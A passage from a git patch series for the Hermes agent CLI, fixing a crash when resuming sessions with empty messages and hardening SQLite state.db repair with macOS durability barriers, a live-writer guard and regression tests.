surfaced by session pickers. Classification looks ONLY at # a session's final message row — role, whether it carries tool_calls, and its # finish_reason — so it stays O(1) per session (see @@ -4283,9 +4298,11 @@ class SessionDB(SessionSearchMixin, SessionSchemaMixin, SessionPortabilityMixin) # Cannot read this process's fd table (different # user, e.g. root gateway vs user desktop). # /proc//cmdline is world-readable by default, - # so check whether this is a Hermes process. + # so check whether this is a Hermes process — + # only flag uninspectable holders that look like + # another Hermes instance, not every system daemon. cmdline = _read_proc_cmdline(pid) - if cmdline is not None: + if cmdline is not None and _looks_like_hermes(cmdline): holders.append((pid, f"uninspectable holder: {cmdline[:80]}")) continue for fd in fds: From f5adeed3dca7f9c0536661888ae37a518ea2ce53 Mon Sep 17 00:00:00 2001 From: AlexFucuson9 Date: Sat, 22 Aug 2026 03:52:37 +0530 Subject: [PATCH 082/161] fix(cli): guard empty message text in _display_resumed_history text.splitlines() returns [] for empty strings. Accessing msg_lines[0] then raises IndexError, making session resume crash when the session contains a message with empty or whitespace-only text (e.g. reasoning-only turns, tool-only assistant messages). Guard with `or [""]` in all three branches (user, assistant_last, regular assistant) so an empty message renders as a blank line. Fixes #59265 Co-authored-by: AlexFucuson9 --- hermes_cli/cli_agent_setup_mixin.py | 6 +++--- tests/cli/test_resume_display.py | 31 +++++++++++++++++++++++++++++ 2 files changed, 34 insertions(+), 3 deletions(-) diff --git a/hermes_cli/cli_agent_setup_mixin.py b/hermes_cli/cli_agent_setup_mixin.py index 7a1082431c..98e8f410b3 100644 --- a/hermes_cli/cli_agent_setup_mixin.py +++ b/hermes_cli/cli_agent_setup_mixin.py @@ -901,20 +901,20 @@ class CLIAgentSetupMixin: elif role == "user": lines.append(" ● You: ", style=f"dim bold {_session_label_c}") # Show first line inline, indent rest - msg_lines = text.splitlines() + msg_lines = text.splitlines() or [""] lines.append(msg_lines[0] + "\n", style="dim") for ml in msg_lines[1:]: lines.append(f" {ml}\n", style="dim") elif role == "assistant_last": # Last assistant response shown in full, non-dim lines.append(" ◆ Hermes: ", style=f"bold {_assistant_label_c}") - msg_lines = text.splitlines() + msg_lines = text.splitlines() or [""] lines.append(msg_lines[0] + "\n", style="") for ml in msg_lines[1:]: lines.append(f" {ml}\n", style="") else: lines.append(" ◆ Hermes: ", style=f"dim bold {_assistant_label_c}") - msg_lines = text.splitlines() + msg_lines = text.splitlines() or [""] lines.append(msg_lines[0] + "\n", style="dim") for ml in msg_lines[1:]: lines.append(f" {ml}\n", style="dim") diff --git a/tests/cli/test_resume_display.py b/tests/cli/test_resume_display.py index d3090c75a6..3c8755c31b 100644 --- a/tests/cli/test_resume_display.py +++ b/tests/cli/test_resume_display.py @@ -173,6 +173,37 @@ class TestDisplayResumedHistory: + def test_empty_message_content_does_not_crash(self): + """Regression: _display_resumed_history IndexError when a message has empty text. + + An assistant turn that produced no text (or a blank user message) + makes ``text.splitlines()`` return ``[]``, crashing on ``msg_lines[0]``. + The fix guards with ``or [""]`` so the message renders as a blank line. + """ + cli = _make_cli() + cli.conversation_history = [ + {"role": "user", "content": ""}, + {"role": "assistant", "content": ""}, + {"role": "user", "content": "Follow-up question"}, + {"role": "assistant", "content": "Real answer"}, + ] + # Must not raise IndexError + output = self._capture_display(cli) + + assert "Follow-up question" in output + assert "Real answer" in output + + def test_whitespace_only_message_does_not_crash(self): + """Whitespace-only messages should also not crash the resume display.""" + cli = _make_cli() + cli.conversation_history = [ + {"role": "user", "content": " "}, + {"role": "assistant", "content": "\n\n"}, + ] + output = self._capture_display(cli) + # Should render without error + assert "You:" in output + def test_minimal_config_suppresses_display(self): cli = _make_cli(config_overrides={"display": {"resume_display": "minimal"}}) # resume_display is captured as an instance variable during __init__ From ca28a69ada74fe2e4589153adc876a2e002e9a4e Mon Sep 17 00:00:00 2001 From: Dhanesh Purohit Date: Thu, 20 Aug 2026 16:18:21 +0530 Subject: [PATCH 083/161] fix(state): apply macOS write barriers on every state.db repair connection MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit state.db corrupted twice in two days with the torn-b-tree signature — repeated "2nd reference to page", "Rowid out of order", and long runs of "never used" pages in messages (rootpage 5) and idx_messages_session. macOS fsync() guarantees neither data-on-platter nor write ordering, which _enforce_macos_synchronous_full already documents: a rewrite interrupted by process or OS termination leaves half-written b-tree pages. The mitigation is per-connection (synchronous=FULL + checkpoint_fullfsync=1) and was applied only through apply_wal_with_fallback(). The repair path opened state.db with a bare sqlite3.connect() six times and then ran REINDEX, VACUUM and writable_schema surgery through it — the operations that rewrite nearly every page of the file — with no barrier at all. - _connect_repair_durable() routes every repair/probe connection through the barriers. Applying them is best-effort by necessity: SQLite loads the schema before any statement, so on a malformed schema even PRAGMA synchronous=FULL raises DatabaseError, and a malformed database is precisely this helper's input. _reapply_durability_barriers() retakes them before REINDEX and VACUUM, once the schema parses and they can stick. - verify_state_db_integrity() adds the proactive check that was missing. Repair only ever ran reactively, after a caller already hit a malformed error, so a database torn in pages no query happened to touch stayed live and kept accepting writes. On 2026-08-19 that gap was 11 hours across two restarts that both reported a clean start. Size-aware: degrades to an O(1) probe above 2 GiB rather than pegging a CPU at startup. Also restores two fixes lost when `hermes update` reset the tree to origin/main before they were committed: - _db_fingerprint keys the repair ledger on dev+inode+size instead of size+mtime_ns. The old form was justified as "stable for a file nothing can successfully write to"; that premise is false, because on FTS corruption this module deliberately keeps canonical writes enabled with FTS detached. mtime churned on every write, so each pass re-keyed the ledger and reset the counter to 1 — the cap could never be reached and the damaging surgery could retry forever. - _live_writer_holds_db() refuses surgery while another connection holds the database. The cross-process lock only serialises repairers against each other; it says nothing about the gateway, Desktop or a CLI. Rewriting b-tree pages under a concurrent writer is what spread the 2026-08-18/19 damage out of the FTS shadow tables and into the canonical ones. Fails open, so it cannot strand the self-heal path it protects. The guard's own tests built a two-table toy schema, so every repair aborted on "no such table: sessions" before reaching the guards under test — the assertions were passing over a code path that never ran. They now build through a real SessionDB. Targeted state/repair suites: 330 passed, 1 pre-existing unrelated failure. Broader sweep: 50 failed/1221 passed -> 46 failed/1225 passed. Co-Authored-By: Claude Opus 5 (1M context) Signed-off-by: Dhanesh Purohit --- hermes_state.py | 227 +++++++++++++++++- .../test_state_db_repair_live_writer_guard.py | 145 +++++++++++ tests/test_state_db_write_durability.py | 210 ++++++++++++++++ 3 files changed, 572 insertions(+), 10 deletions(-) create mode 100644 tests/test_state_db_repair_live_writer_guard.py create mode 100644 tests/test_state_db_write_durability.py diff --git a/hermes_state.py b/hermes_state.py index 1e2132ea2c..ad51583096 100644 --- a/hermes_state.py +++ b/hermes_state.py @@ -1860,16 +1860,30 @@ def _repair_ledger_path(db_path: Path) -> Path: def _db_fingerprint(db_path: Path) -> "Optional[str]": - """Cheap identity for a damaged DB file: size + mtime_ns. + """Cheap identity for a damaged DB file: device + inode + size. Hashing a multi-GB corrupt file on every open is exactly the kind of - repeated cost this ledger exists to avoid; size+mtime is stable for a - file nothing can successfully write to, and any successful repair, - truncation or manual restore changes it (resetting the attempt count). + repeated cost this ledger exists to avoid. + + ``mtime_ns`` was the original third component, justified as "stable for a + file nothing can successfully write to". That premise is false, and it + is the defect that let the 2026-08-18/19 incident run unbounded: on FTS + corruption this module deliberately keeps "canonical writes enabled with + FTS detached", so the gateway kept writing and mtime churned. Every + repair pass re-keyed the ledger and reset the counter to 1 — three real + passes (00:14, 00:35, 00:45) each recorded ``failed_attempts: 1``, so the + cap could never be reached and the damaging surgery could retry forever. + + Device+inode is stable across those writes. ``size`` is retained so an + in-place restore that reuses the inode still reads as a different file. + In WAL mode commits land in the ``-wal`` sidecar, so the main database's + size holds steady between checkpoints — a checkpoint that grows the file + grants a fresh budget, which is the intended "the file materially + changed" signal rather than the per-write churn that broke the cap. """ try: st = db_path.stat() - return f"{st.st_size}:{st.st_mtime_ns}" + return f"{st.st_dev}:{st.st_ino}:{st.st_size}" except OSError: return None @@ -2137,6 +2151,131 @@ def preflight_db_writability( _ensure_writable(p) +def _connect_repair_durable(db_path: Path) -> sqlite3.Connection: + """``sqlite3.connect`` for the repair/probe paths, with macOS write barriers. + + These paths open ``state.db`` directly rather than through ``SessionDB`` + (which routes via :func:`apply_wal_with_fallback`), so they inherited + SQLite's ``synchronous=NORMAL`` default and no ``checkpoint_fullfsync``. + On Darwin that is exactly the combination :func:`_enforce_macos_synchronous_full` + exists to prevent: ``fsync()`` there guarantees neither data-on-platter nor + write ordering, so a rewrite interrupted by process or OS termination can + leave half-written b-tree pages behind. + + That matters more here than anywhere else in the module, because what runs + through these connections is ``REINDEX``, ``VACUUM`` and ``writable_schema`` + surgery — the operations that rewrite nearly every page of the file. The + 2026-08-19 recurrence tore ``messages`` (root page 5) and + ``idx_messages_session``, reporting the unmistakable signature: repeated + "2nd reference to page", a rowid out of order, and long runs of leaked + "never used" pages. + + Autocommit (``isolation_level=None``) is preserved: callers run DDL and + ``VACUUM``, which are illegal inside an implicit transaction. + + Applying the barriers is best-effort *by necessity*: SQLite loads the + schema before it runs any statement, so on a malformed schema even + ``PRAGMA synchronous=FULL`` raises ``DatabaseError`` ("malformed database + schema (messages_fts) - table messages_fts already exists"). A malformed + database is precisely this helper's input, so raising there would leave + repair unable to open the file it exists to fix. Strategies that go on to + rewrite the whole file call :func:`_reapply_durability_barriers` once the + schema parses again, which is the point at which the pragmas can stick. + """ + conn = sqlite3.connect(str(db_path), isolation_level=None) + _reapply_durability_barriers(conn) + return conn + + +def _reapply_durability_barriers(conn: sqlite3.Connection) -> bool: + """Best-effort (re)application of the macOS write barriers. Never raises. + + Returns True when the pragmas were accepted. Callers about to rewrite the + file wholesale (``VACUUM``, ``REINDEX``) should call this after the schema + becomes parseable, because a connection opened against a malformed schema + could not take them at open time. + """ + try: + _apply_macos_checkpoint_barrier(conn) + _enforce_macos_synchronous_full(conn) + return True + except sqlite3.DatabaseError: + # Schema still unparseable — the pragmas cannot be set yet. + return False + except Exception: + return False + + +def verify_state_db_integrity( + db_path: Path, + *, + max_bytes: int = 2 << 30, +) -> Dict[str, Any]: + """Proactively verify ``db_path``. Returns a report; never raises. + + Repair has only ever run *reactively* — when a caller already hit a + malformed error on open. A database torn in pages that no query happens + to touch stays live and keeps accepting writes until something finally + lands on the damage. On 2026-08-19 that gap was 11 hours: the tear + landed in pages holding rows written at 02:18-02:22 and was not seen + until 13:36, across two gateway restarts that both reported a clean start. + + ``PRAGMA integrity_check`` walks every page, so it is O(file size) — the + same reason :func:`hermes_cli.backup.verify_sqlite_integrity` caps it. + Above ``max_bytes`` this degrades to an O(1) structural probe rather than + pegging a CPU for minutes at gateway startup. + + Report keys: + ``ok`` — False only on positive evidence of damage. + ``problems`` — integrity_check rows that were not "ok". + ``checked`` — "full" | "probe" | "absent" | "error". + """ + report: Dict[str, Any] = {"ok": True, "problems": [], "checked": "absent"} + try: + if not db_path.is_file(): + return report + size = db_path.stat().st_size + if size == 0: + # A zero-byte file is handled by the dedicated zeroed-DB path. + return report + except OSError as exc: + report["checked"] = "error" + report["problems"] = [f"stat failed: {exc}"] + return report + + conn = None + try: + conn = sqlite3.connect(f"file:{db_path}?mode=ro", uri=True, timeout=5.0) + if size > max_bytes: + report["checked"] = "probe" + conn.execute("PRAGMA schema_version").fetchone() + conn.execute("SELECT count(*) FROM sqlite_master").fetchone() + return report + report["checked"] = "full" + rows = conn.execute("PRAGMA integrity_check").fetchall() + problems = [str(r[0]) for r in rows if r and str(r[0]).lower() != "ok"] + if problems: + report["ok"] = False + report["problems"] = problems + except sqlite3.DatabaseError as exc: + # The DB refused to open or parse — positive evidence of damage. + report["ok"] = False + report["checked"] = "error" + report["problems"] = [str(exc)] + except Exception as exc: + # Environmental (permissions, locks): not proof of corruption, so do + # not claim damage — but do not claim health either. + report["checked"] = "error" + report["problems"] = [str(exc)] + finally: + if conn is not None: + try: + conn.close() + except Exception: + pass + return report + + def _db_opens_cleanly(db_path: Path) -> Optional[str]: """Probe a DB on a fresh connection. Returns None if healthy, else a reason. @@ -2148,7 +2287,7 @@ def _db_opens_cleanly(db_path: Path) -> Optional[str]: through the FTS triggers — is reported as unhealthy rather than slipping past as a false "ok" (#50502). """ - conn = sqlite3.connect(str(db_path), isolation_level=None) + conn = _connect_repair_durable(db_path) try: # Best-effort tokenizer load: a DB carrying the messages_fts_cjk # index needs the cjk_unicode61 extension before any statement can @@ -2263,6 +2402,50 @@ def _db_opens_cleanly(db_path: Path) -> Optional[str]: conn.close() +def _live_writer_holds_db(db_path: Path) -> bool: + """True when a connection outside this call still holds ``db_path`` open. + + Detection works by asking SQLite for the thing a repair actually needs and + a live writer cannot grant: ``PRAGMA locking_mode=EXCLUSIVE`` followed by + ``BEGIN IMMEDIATE``. In WAL mode, entering exclusive locking mode + requires exclusive locks on the WAL index, so any other open connection — + reader or writer — makes it fail with SQLITE_BUSY. Neither statement + parses the schema, so this works on the malformed databases repair exists + to handle. + + Fails **open** (returns False) on anything other than a positive + busy/locked signal: refusing to repair a database that nobody is actually + holding would strand the very self-heal path this guard protects. + """ + probe = None + try: + probe = sqlite3.connect(str(db_path), timeout=0.0, isolation_level=None) + probe.execute("PRAGMA locking_mode=EXCLUSIVE") + probe.execute("BEGIN IMMEDIATE") + probe.execute("ROLLBACK") + return False + except sqlite3.OperationalError as exc: + lowered = str(exc).lower() + return "locked" in lowered or "busy" in lowered + except sqlite3.DatabaseError: + # Malformed/unreadable: no evidence of a live holder either way. + return False + except Exception: + return False + finally: + if probe is not None: + try: + # Drop exclusive locking mode before closing so the probe + # itself never leaves the file pinned. + probe.execute("PRAGMA locking_mode=NORMAL") + except Exception: + pass + try: + probe.close() + except Exception: + pass + + def repair_state_db_schema(db_path: Path, *, backup: bool = True) -> Dict[str, Any]: """Repair a state.db whose ``sqlite_master`` schema is malformed or whose FTS indexes reject writes. @@ -2341,6 +2524,23 @@ def repair_state_db_schema(db_path: Path, *, backup: bool = True) -> Dict[str, A "schema surgery to avoid racing it" ) return report + + # The cross-process lock serialises repairers against each other; it + # says nothing about the gateway, Desktop or a CLI still holding the + # database open. Rewriting b-tree pages under a concurrent writer is + # what spread the 2026-08-18/19 damage out of the FTS shadow tables + # and into the canonical ones. The caller closes only its own + # connection — the incident process held seven descriptors on + # state.db — so probe for the rest before touching anything. + if _live_writer_holds_db(db_path): + report["error"] = ( + "a live writer still holds state.db; skipped schema surgery " + "to avoid tearing b-tree pages under a concurrent writer. " + "Stop the gateway (hermes gateway stop) and retry." + ) + logger.error("state.db repair skipped: %s", report["error"]) + return report + result = _repair_state_db_schema_locked(db_path, backup=backup, report=report) # Persist the outcome AFTER surgery, keyed on the post-attempt # fingerprint — that is the file state the NEXT attempt's exhaustion @@ -2391,7 +2591,7 @@ def _repair_state_db_schema_locked( # content table. This is the recommended, least-destructive recovery for a # corrupt FTS index that rejects message writes while reads still succeed. try: - conn = sqlite3.connect(str(db_path), isolation_level=None) + conn = _connect_repair_durable(db_path) try: # The cjk index can only be rebuilt with its tokenizer loaded; # best-effort (a tokenizer-less host skips it at the probe below). @@ -2427,8 +2627,11 @@ def _repair_state_db_schema_locked( # rows using the existing index definition, fixing the mismatch without # touching data or FTS schema. try: - conn = sqlite3.connect(str(db_path), isolation_level=None) + conn = _connect_repair_durable(db_path) try: + # REINDEX rewrites every index b-tree; take the barriers now that + # the schema parses, in case the open-time attempt was refused. + _reapply_durability_barriers(conn) conn.execute("REINDEX") conn.commit() finally: @@ -2445,7 +2648,7 @@ def _repair_state_db_schema_locked( # ── Strategy 1: de-duplicate sqlite_master (keeps FTS index) ── try: - conn = sqlite3.connect(str(db_path), isolation_level=None) + conn = _connect_repair_durable(db_path) try: conn.execute("PRAGMA writable_schema=ON") dupes = conn.execute( @@ -2477,13 +2680,17 @@ def _repair_state_db_schema_locked( # ── Strategy 2: drop all FTS schema, VACUUM, rebuild on next open ── try: - conn = sqlite3.connect(str(db_path), isolation_level=None) + conn = _connect_repair_durable(db_path) try: conn.execute("PRAGMA writable_schema=ON") conn.execute("DELETE FROM sqlite_master WHERE name LIKE 'messages_fts%'") _bump_schema_cookie(conn) conn.execute("PRAGMA writable_schema=OFF") conn.commit() + # The schema is repaired and parseable now, so the barriers can + # finally stick — and VACUUM, which rewrites the entire file, is + # the single most damaging operation to lose halfway. + _reapply_durability_barriers(conn) conn.execute("VACUUM") finally: conn.close() diff --git a/tests/test_state_db_repair_live_writer_guard.py b/tests/test_state_db_repair_live_writer_guard.py new file mode 100644 index 0000000000..e468f1a2ce --- /dev/null +++ b/tests/test_state_db_repair_live_writer_guard.py @@ -0,0 +1,145 @@ +"""Regression: the state.db repair path must be bounded and must never run +surgery against a database another connection is still writing. + +Incident (2026-08-18/19): FTS5 shadow-table corruption escalated into b-tree +page damage across `system_prompts`, `session_model_usage` and the `sessions` +index. Two defects in this module turned a contained, rebuildable FTS fault +into unrecoverable data loss (292 `delivery_obligations` rows): + +1. `_db_fingerprint` keyed the persistent attempt ledger on ``size:mtime_ns``, + documented as "stable for a file nothing can successfully write to". That + premise is false: on FTS corruption hermes_state deliberately keeps + "canonical writes enabled with FTS detached", so the gateway kept writing + and mtime churned. Every repair pass re-keyed the ledger and reset the + counter to 1 — three real passes (00:14, 00:35, 00:45) all recorded + ``failed_attempts: 1``, so `_MAX_PERSISTENT_REPAIR_ATTEMPTS` could never + be reached and the damaging surgery could retry forever. + +2. `repair_state_db_schema` ran its REINDEX/FTS-rebuild strategies while other + connections still held the database open. The caller closes only its own + `self._conn`; the incident process held seven descriptors on state.db. + Rewriting b-tree pages under concurrent writers is what spread the damage + out of the FTS shadow tables and into the canonical tables. +""" + +from __future__ import annotations + +import sqlite3 +import time +import uuid +from pathlib import Path + +from hermes_state import ( + SessionDB, + _MAX_PERSISTENT_REPAIR_ATTEMPTS, + _db_fingerprint, + _persistent_repair_attempts_exhausted, + _record_repair_outcome, + repair_state_db_schema, +) + + +def _make_wal_db(tmp_path: Path) -> Path: + """A state.db the repair path will actually work on. + + Built through the real ``SessionDB`` rather than a hand-rolled two-table + schema. The repair path probes the canonical schema as it goes — + ``_db_opens_cleanly`` runs ``SELECT COUNT(*) FROM sessions`` and a + rolled-back ``messages`` write — so a toy schema aborted every repair + ("no such table: sessions", then "table sessions has no column named id") + long before reaching the guards these tests exist to cover. The + assertions below were passing over a code path that never ran. + """ + db = tmp_path / "state.db" + handle = SessionDB(db_path=db) + sid = handle.create_session(session_id=str(uuid.uuid4()), source="cli") + handle.append_message(sid, role="user", content="seed") + handle.close() + return db + + +def _write_once(db: Path) -> None: + """Simulate the gateway's ongoing canonical writes (FTS detached).""" + handle = SessionDB(db_path=db) + sid = handle.create_session(session_id=str(uuid.uuid4()), source="cli") + handle.append_message(sid, role="user", content="canonical write") + handle.close() + + +# --------------------------------------------------------------------------- +# Defect 1: the ledger fingerprint must survive ongoing writes +# --------------------------------------------------------------------------- + + +def test_fingerprint_is_stable_while_the_gateway_keeps_writing(tmp_path): + """Identity must track the FILE, not its mtime/contents. + + A corrupt state.db still accepts canonical writes, so a mtime- or + content-derived fingerprint changes constantly and silently re-keys the + attempt ledger. + """ + db = _make_wal_db(tmp_path) + before = _db_fingerprint(db) + + time.sleep(0.01) + _write_once(db) + + assert _db_fingerprint(db) == before + + +def test_repair_budget_is_exhausted_despite_ongoing_writes(tmp_path): + """Three failed passes must exhaust the budget even with writes between. + + This is the exact incident shape: three real repair attempts, each + separated by gateway writes, all recorded ``failed_attempts: 1``. + """ + db = _make_wal_db(tmp_path) + + for _ in range(_MAX_PERSISTENT_REPAIR_ATTEMPTS): + _record_repair_outcome(db, repaired=False) + time.sleep(0.01) + _write_once(db) + + assert _persistent_repair_attempts_exhausted(db) is True + + +def test_successful_repair_still_clears_the_budget(tmp_path): + """A healed database must not inherit a spent budget.""" + db = _make_wal_db(tmp_path) + + for _ in range(_MAX_PERSISTENT_REPAIR_ATTEMPTS): + _record_repair_outcome(db, repaired=False) + assert _persistent_repair_attempts_exhausted(db) is True + + _record_repair_outcome(db, repaired=True) + + assert _persistent_repair_attempts_exhausted(db) is False + + +# --------------------------------------------------------------------------- +# Defect 2: repair must refuse to operate under a live writer +# --------------------------------------------------------------------------- + + +def test_repair_refuses_while_another_connection_holds_the_db(tmp_path): + """Surgery under concurrent writers is what spread the corruption.""" + db = _make_wal_db(tmp_path) + + holder = sqlite3.connect(str(db)) + holder.execute("SELECT count(*) FROM messages").fetchone() + try: + report = repair_state_db_schema(db, backup=False) + finally: + holder.close() + + assert report["repaired"] is False + assert "live writer" in (report["error"] or "").lower() + + +def test_repair_proceeds_once_the_database_is_quiescent(tmp_path): + """The guard must not deadlock repair on an exclusively-held file.""" + db = _make_wal_db(tmp_path) + + report = repair_state_db_schema(db, backup=False) + + assert "live writer" not in (report["error"] or "").lower() diff --git a/tests/test_state_db_write_durability.py b/tests/test_state_db_write_durability.py new file mode 100644 index 0000000000..fb012ad6a1 --- /dev/null +++ b/tests/test_state_db_write_durability.py @@ -0,0 +1,210 @@ +"""Regression: state.db repair-path writes must be durable on macOS, and a +torn database must be detected proactively rather than 11 hours later. + +Incident (2026-08-19, recurrence of 2026-08-18/19): `state.db` was recovered +clean at 01:02, tore again in the pages holding rows written 02:18-02:22, and +the damage went undetected until 13:36 when a write finally landed on a +damaged page (`append_message failed: constraint failed`). `PRAGMA +integrity_check` on the file reported the torn-b-tree signature: + + Tree 5 page 47256 cell 423..429: 2nd reference to page ... + Tree 5 page 60788 cell 4: Rowid 34637 out of order + Page 50549..52587: never used + +Two defects: + +1. hermes_state already knows macOS `fsync()` does not guarantee write + ordering, and mitigates it with `synchronous=FULL` + + `checkpoint_fullfsync=1` (see `_enforce_macos_synchronous_full`, whose + docstring names this exact failure: "a WAL checkpoint race with process + termination ... can leave the main DB with half-written btree pages"). + Those pragmas are per-connection and were applied only via + `apply_wal_with_fallback()`. The repair path opened `state.db` with a bare + `sqlite3.connect()` five times and then ran REINDEX, VACUUM and + `writable_schema` surgery through it — the operations that rewrite nearly + every page of the file — with no barrier at all. + +2. Repair only ran reactively, when a caller already hit a malformed error + (`SessionDB` open). Nothing checked the file proactively, so a torn + database stayed live and accepted writes for hours before anyone noticed. +""" + +from __future__ import annotations + +import re +import sqlite3 +import sys +from pathlib import Path + +import pytest + +import hermes_state +from hermes_state import ( + _connect_repair_durable, + repair_state_db_schema, + verify_state_db_integrity, +) + + +def _make_db(tmp_path: Path) -> Path: + db = tmp_path / "state.db" + conn = sqlite3.connect(str(db)) + conn.execute("PRAGMA journal_mode=WAL") + conn.execute("CREATE TABLE sessions (session_id TEXT PRIMARY KEY)") + conn.execute("CREATE TABLE messages (id INTEGER PRIMARY KEY, body TEXT)") + conn.execute("INSERT INTO messages (body) VALUES ('seed')") + conn.commit() + conn.close() + return db + + +# ── Defect 1: repair-path write durability ────────────────────────────── + + +def test_connect_repair_durable_sets_macos_barriers(tmp_path: Path) -> None: + """The repair connection must carry both macOS durability barriers.""" + db = _make_db(tmp_path) + conn = _connect_repair_durable(db) + try: + synchronous = conn.execute("PRAGMA synchronous").fetchone()[0] + checkpoint_fullfsync = conn.execute( + "PRAGMA checkpoint_fullfsync" + ).fetchone()[0] + finally: + conn.close() + + if sys.platform == "darwin": + # SQLite: 0=OFF, 1=NORMAL, 2=FULL, 3=EXTRA. NORMAL is what tore the + # b-tree pages; FULL is what _enforce_macos_synchronous_full sets. + assert synchronous == 2, ( + f"repair connection opened with synchronous={synchronous}; on " + "Darwin this lets REINDEX/VACUUM leave half-written b-tree pages" + ) + assert checkpoint_fullfsync == 1, ( + "repair connection has no F_FULLFSYNC barrier at checkpoint " + "boundaries; macOS fsync() does not flush the drive cache" + ) + else: + # Elsewhere the helper is a plain connect — no behaviour change. + assert synchronous in (0, 1, 2, 3) + + +def test_connect_repair_durable_is_autocommit(tmp_path: Path) -> None: + """Must preserve isolation_level=None — repair runs DDL and VACUUM.""" + db = _make_db(tmp_path) + conn = _connect_repair_durable(db) + try: + assert conn.isolation_level is None + # VACUUM is only legal outside an implicit transaction. + conn.execute("VACUUM") + finally: + conn.close() + + +def test_repair_path_has_no_bare_connects() -> None: + """No repair/probe site may bypass the durability helper. + + Source-level guard: the bare form is exactly what regressed, and a unit + test on the helper alone would not notice a sixth site being added. + """ + source = Path(hermes_state.__file__).read_text() + pattern = r"^\s*conn = sqlite3\.connect\(str\(db_path\), isolation_level=None\)" + + # The one legitimate bare connect is inside the helper itself; everything + # after that definition must go through it. + helper = source.index("def _connect_repair_durable(") + body_end = source.index("\ndef ", helper + 1) + inside_helper = re.findall(pattern, source[helper:body_end], flags=re.MULTILINE) + assert len(inside_helper) == 1, ( + "_connect_repair_durable no longer opens the connection itself" + ) + + elsewhere = re.findall( + pattern, source[:helper] + source[body_end:], flags=re.MULTILINE + ) + assert elsewhere == [], ( + f"{len(elsewhere)} repair-path connection(s) still bypass " + "_connect_repair_durable() and write state.db without the macOS " + "fsync barriers" + ) + + +def test_repair_still_works_through_durable_connection(tmp_path: Path) -> None: + """Routing every strategy through the helper must not break the path. + + The helper is entered once per strategy, so a plumbing fault (recursion, + a leaked connection, a refused pragma) surfaces as an exception rather + than a report. Whether this fixture's minimal schema is *repairable* is + beside the point — the assertion is that the path runs to completion. + """ + db = _make_db(tmp_path) + report = repair_state_db_schema(db, backup=False) + assert isinstance(report, dict) + assert set(report) >= {"repaired", "strategy", "backup_path"} + # The file must still open afterwards — repair may fail, but it must not + # leave the database less usable than it found it. + conn = sqlite3.connect(str(db)) + try: + assert conn.execute("SELECT COUNT(*) FROM messages").fetchone()[0] == 1 + finally: + conn.close() + + +# ── Defect 2: proactive verification gate ─────────────────────────────── + + +def test_verify_state_db_integrity_passes_on_healthy_db(tmp_path: Path) -> None: + db = _make_db(tmp_path) + result = verify_state_db_integrity(db) + assert result["ok"] is True + assert result["problems"] == [] + + +def test_verify_state_db_integrity_detects_torn_btree(tmp_path: Path) -> None: + """A torn database must be reported, not silently accepted.""" + db = _make_db(tmp_path) + # Grow past one page, then corrupt an interior/leaf page directly — the + # same class of damage as "2nd reference to page" / "never used". + conn = sqlite3.connect(str(db)) + conn.execute("PRAGMA journal_mode=DELETE") + conn.executemany( + "INSERT INTO messages (body) VALUES (?)", + [(f"row-{i}" * 40,) for i in range(500)], + ) + conn.commit() + conn.close() + + page_size = 4096 + raw = bytearray(db.read_bytes()) + # Scribble over a data page (page 3+), leaving the header page intact so + # the file still opens — that is what makes this class so long-lived. + start = page_size * 4 + raw[start:start + page_size] = b"\xff" * page_size + db.write_bytes(bytes(raw)) + + result = verify_state_db_integrity(db) + assert result["ok"] is False + assert result["problems"], "torn pages reported no problems" + + +def test_verify_state_db_integrity_skips_pragma_when_oversized( + tmp_path: Path, +) -> None: + """Must degrade to an O(1) probe rather than pegging a CPU for minutes. + + `PRAGMA integrity_check` walks every page, so an unbounded check at + startup would hang the gateway on a multi-GB state.db. + """ + db = _make_db(tmp_path) + result = verify_state_db_integrity(db, max_bytes=1) + assert result["ok"] is True + assert result["checked"] == "probe" + + +def test_verify_state_db_integrity_missing_file_is_not_a_failure( + tmp_path: Path, +) -> None: + """A first run has no state.db yet; that must not look like corruption.""" + result = verify_state_db_integrity(tmp_path / "absent.db") + assert result["ok"] is True + assert result["checked"] == "absent" From 3bdc2165c3e82b203c43d0187ffa9bb929adf8f5 Mon Sep 17 00:00:00 2001 From: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com> Date: Sat, 22 Aug 2026 03:54:18 +0530 Subject: [PATCH 084/161] fix(state): scope salvage to repair-connection durability + live-writer guard Follow-up to the salvaged repair-durability commit. Scope corrections so this PR ships only the reachable, non-competing, WAL-mode-correct half: - Drop verify_state_db_integrity() + its 4 tests. Zero production callers here (dead code); the caller lives in the follow-up that wires it into SessionStore._open_session_db_for_active_scope() (PR #91754). The function moves with its wiring. - Drop the _db_fingerprint change (size:mtime_ns -> dev:ino:size) + its 3 ledger tests. This is competing work: PR #88425 (salvage of @jirathip-k's #88224) already fixes the same size:mtime_ns budget-reset bug with a content-sample + volatile-header-mask that also handles the DELETE-mode commit-counter case, and carries @jirathip-k's diagnosis/credit. Landing a second, divergent fingerprint contract would stomp that lineage. Fingerprint stays with #88425; this PR reverts _db_fingerprint to main's form. - Mark test_repair_refuses_while_another_connection_holds_the_db requires_wal. _live_writer_holds_db detects an out-of-process holder via the WAL-index exclusive lock, absent in journal_mode=DELETE (used on WAL-reset-vulnerable SQLite <3.51.3 incl. CI's 3.50.4, and on NFS/SMB). The test failed there; the conftest requires_wal gate auto-skips it. DELETE-mode limitation is now documented on the guard docstring: repair is serialised only by the cross-process repairer lock there. The reported incident was in WAL mode. - Map dhanesh@users.noreply.github.com -> dhanesh (contributors/emails) so the attribution CI gate passes. Net: this PR is repair-connection durability barriers + the live-writer guard. addresses @andrexibiza's #90747 review (dead-code verifier + fingerprint interlock with #88425). --- .../emails/dhanesh@users.noreply.github.com | 2 + hermes_state.py | 104 +++------------- .../test_state_db_repair_live_writer_guard.py | 114 +++++------------- tests/test_state_db_write_durability.py | 93 +++----------- 4 files changed, 63 insertions(+), 250 deletions(-) create mode 100644 contributors/emails/dhanesh@users.noreply.github.com diff --git a/contributors/emails/dhanesh@users.noreply.github.com b/contributors/emails/dhanesh@users.noreply.github.com new file mode 100644 index 0000000000..7601ad7763 --- /dev/null +++ b/contributors/emails/dhanesh@users.noreply.github.com @@ -0,0 +1,2 @@ +dhanesh +# PR #90747 salvage (state.db repair durability) via #91852 diff --git a/hermes_state.py b/hermes_state.py index ad51583096..60e63ba8ee 100644 --- a/hermes_state.py +++ b/hermes_state.py @@ -1860,30 +1860,16 @@ def _repair_ledger_path(db_path: Path) -> Path: def _db_fingerprint(db_path: Path) -> "Optional[str]": - """Cheap identity for a damaged DB file: device + inode + size. + """Cheap 